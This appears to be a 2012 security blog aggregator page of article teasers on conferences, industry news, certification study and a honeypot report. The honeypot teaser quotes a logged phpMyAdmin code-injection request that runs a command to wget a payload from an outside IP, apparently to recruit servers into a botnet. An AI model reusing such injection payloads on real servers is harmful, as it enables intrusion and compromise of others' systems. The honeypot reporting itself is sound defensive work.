Aurora Borealis Over the Midwest
National Aeronautics and Space Administration (NASA) photograph, depicting the Aurora Borealis above Southern Nebraska. ƻ
View ArticleBest of the week – 19 febbraio 2012
Here we are with another best of the week post. My list of the best security articles of this week.Hope you enjoy it! @teamcymru interview with TeaMp0isoN's "TriCk". Seriously, you ought to read this...
View ArticleCybersecurity Act of 2012 – Cybersecurity collides with real-world risk with...
Every time I see a headline like "Experts urge stronger cyber regulation bill" I'm fairly sure there's a story someone purposefully didn't elaborate on. In this case there is an interesting push and...
View ArticleComment on "Who is trying to join up the policies? Who would you trust to do...
I apologise to those readers who have been trying to post comments and could not do so. Hopefully the lovely people who look after technical support for Computer Weekly will find and correct the...
View ArticleSBN Sponsor Post
Share your best advice with us – tell us the best advice you’ve ever received, heard or given.http://bit.ly/xbdT9q
View ArticleFBI Coffee
According to a flier issued by the FBI on how to spot suspicious activity, if you see someone paying for small items like a coffee with cash, it could be a sign that they are up to no good! Other …...
View ArticleCISSP Reloaded–Domain 3: Telecomms & Network Security
This is the 3rd part on my CISSP Reloaded where I am revisiting the 10 CISSP domains I studied for many years ago to see what has changed and how much of it I have retained as well as adding … Continue...
View ArticleTOOOL’s ShmooCon
Brought to my direct scruitny by SecurityOrb’s Kellep Charles, a fellow Security Bloggers Network member. Outstanding! ɱ , ʂ , ʐ
View ArticleEC-Council Summit San Antonio 2012, June 11 14
The all-new EC-Council Summit series is created to make advanced security training opportunities available for information security professionals across the globe. Attendees get to choose from a...
View ArticleInvitation to connect on LinkedIn
From Alan Shimel Managing Partner at The CISO Group West Palm Beach, Florida Area TypePad,I'd like to add you to my professional network on LinkedIn.- Alan Confirm that you...
View ArticleRisky Business at the RSA Conference
Next week we’ll start our live coverage from the largest security conference in North America, the RSA Conference in San Francisco. Dwayne Melancon, CTO of Tripwire, will be giving a presentation...
View ArticleNitrozac and Snaggy: Mountain Lion Safety
via the genius of Nitrozac and Snaggy at The Joy of Tech™
View ArticleBits & Bytes: Mischel Kwon
Note: Bits & Bytes is a new reoccurring column featuring interesting figures in the security industry. The intent is to provide a quick interview that allows readers to learn more about the...
View Article(Re) Introducing Adrienne Hall
Posted by: Richard Saunders, Director, Trustworthy Computing Many years ago I worked for a company in the UK that made paint. I was part of a team planning an official visit by HRH Princess Anne to...
View ArticleEC-Council to Host Advanced Technical Security Summits in Alexandria and San...
The Center of Advanced Security Training (CAST) - the advanced training division of EC-Council - announces the next installment of its successful advanced training series ‘EC-Council Summit’ (formerly...
View ArticleClamAV vs. Content IQ Test, part 1
This is the first in a series of blog posts about the Content IQ Test.A few days ago, we came across a test whose purpose is to gauge a security system's ability to detect client-side attacks. The...
View Article[Honeypot Alert] phpMyAdmin Code Injection Attacks for Botnet Recruitment
Our web honeypots picked up the following attacks today: 62.149.12.62 - - [21/Feb/2012:04:25:55 -0600] "GET /mysql//config.sample.inc.php?eval=system('echo cd /tmp;wget http://199.115.228.9/vp.txt -O...
View ArticleExploiting the exploitable: New software vulnerabilities down, but risk...
“If the Rebels have obtained a complete technical reading of this station, it is possible, however unlikely, they might find a weakness and exploit it.” The geek in me couldn’t resist the Star Wars...
View ArticleSBN Sponsor Post
Get a sneak peak into RSA Conference 2012 with podcasts from industry experts and speakers.http://bit.ly/fmaLXU
View Article